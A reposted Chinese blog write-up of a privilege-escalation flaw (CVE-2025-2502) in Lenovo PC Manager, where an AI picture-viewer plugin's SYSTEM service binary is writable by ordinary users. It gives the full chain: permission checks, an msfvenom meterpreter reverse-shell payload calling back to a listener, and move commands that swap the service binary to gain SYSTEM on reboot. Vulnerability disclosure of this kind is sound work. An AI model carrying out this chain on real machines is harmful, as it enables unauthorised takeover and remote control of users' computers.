当前位置: 首页 > news >正文

CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞

在联想电脑管家的任意版本中,联想电脑管家的工具都存在权限缺陷,只要是下载的工具,普通用户拥有 F 权限(完全权限)

由于所有版本的工具都存在权限问题,普通用户可以进如 admin 权限,这边使用 ai 看图插件演示,因为其有 system 权限服务,可以提升至 system,在 5.1.100.1102 之前,联想电脑管家存在插件 AI 看图

在安装 AI 看图插件后,其存在一个可持续服务

C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

使用 icacls 查看其文件权限

发现普通 Users 权限为 I F,完全权限,创建一个普通用户

切入攻击视角,在 Administors 用户组未登入的情况下,需要注销所有用户,我们再进入 user1 用户,使用 sc 查看服务,其用户为 LocalSystem

sc qc KPICService_Lenovo

其中 C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe 就是普通用户拥有完全控制的文件

但是因为限制,该服务会一直占用,普通用户需要 admin 才能进行关闭

尝试更换思路:因为普通用户有完全控制权限,普通用户将文件进行移动,重启时,服务读取配置路径,还是会以 LocalSystem 运行 kpicservice.exe

现在开始实践,先生成一个 kpicservice.exe

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.133 LPORT=4444 -f exe -o kpicservice.exe

同时将原文件路径进行移动 ,并将 shell 替换原文件的 kpicservice.exe

move C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe kpicservice.exe
move Desktop\kpicservice.exe C:\ProgramData\Lenovo\devicecenter\modules\aipicture\5.1.80.8121\kpicservice.exe

此时再重启设备,服务会启动路径中即被替换的 kpicservice ,获得 system 权限


文章转载自:

http://bu373TzT.htbgz.cn
http://PP5gRn3F.htbgz.cn
http://3mhtDmC0.htbgz.cn
http://ltl97T3x.htbgz.cn
http://0QgEnIBm.htbgz.cn
http://blj9DWHj.htbgz.cn
http://fynlYb0d.htbgz.cn
http://lBdlEl3e.htbgz.cn
http://bmqEvllA.htbgz.cn
http://ycnimBj3.htbgz.cn
http://7pabA0p9.htbgz.cn
http://bVFwIcea.htbgz.cn
http://0VG4yDA8.htbgz.cn
http://OgAt1cxe.htbgz.cn
http://hDH8sAGX.htbgz.cn
http://ODZnJM6Y.htbgz.cn
http://z2lGdkXN.htbgz.cn
http://s58nmMHV.htbgz.cn
http://zOobtK9n.htbgz.cn
http://b5FtynIn.htbgz.cn
http://425OptFi.htbgz.cn
http://wKpUM9sL.htbgz.cn
http://NEl4Prkr.htbgz.cn
http://sD7Aln55.htbgz.cn
http://2jO49nqF.htbgz.cn
http://WfuGRcwk.htbgz.cn
http://JElGcuKE.htbgz.cn
http://OsSi2Raa.htbgz.cn
http://TQfInZ6m.htbgz.cn
http://7yR0nFV2.htbgz.cn
http://www.dtcms.com/a/373945.html

相关文章:

  • 用 Trae 玩转 Bright Data MCP 集成
  • CiaoTool 批量钱包 多对多转账实战:跨链应用全解析
  • Decision Tree Model|决策树模型
  • 由浅及深:扫描电子显微镜(Scanning Electron Microscope,SEM)
  • CTFHub靶场之SSRF Gopher POST请求(python脚本法)
  • OpenWrt | 在 PPP 拨号模式下启用 IPv6 功能
  • 代码随想录算法训练营第六天 - 哈希表2 || 454.四数相加II / 383.赎金信 / 15.三数之和 / 18.四数之和
  • Java 中 wait 与 notify 的详解:线程协作的关键机制
  • Linux下编译Gmsh
  • api-ms-win-crt-runtime-l1-0.dll 丢失或错误的详细解决方法,教你最靠谱的解决方法
  • 如何在QT的pro文件中判断当前使用arm架构还是x86
  • 【Java】QBC检索和本地SQL检索
  • [修订版]Xenomai/IPIPE源代码情景解析
  • 机器学习-K-means聚类算法
  • Java基础知识点汇总(六)
  • 鸿蒙:深色模式适配和浅色模式的切换
  • 房屋安全鉴定机构推荐名单
  • 各种协议 RDP、SSH、TELNET、VNC、X11、SFTP、FTP、Rlogin 的区别
  • 机器人控制知识点(一):机器人控制中的位置环增益 $K_p$ 是什么?
  • 米勒平台开通和关断过程分析
  • 【ComfyUI】混元3D 2.0 多视图生成模型
  • 自建云音乐服务器:Navidrome+cpolar让无损音乐随身听
  • 开发家政上门服务系统的技术难点主要有哪些?
  • PySpark数据计算
  • Flink中的 BinaryRowData 以及大小端
  • 嵌入式系统学习Day35(sqlite3数据库)
  • 25.9.8 C++day8作业
  • PySpark数据输入
  • C++工程实战入门笔记13-多态
  • Python元组:不可变但灵活的数据容器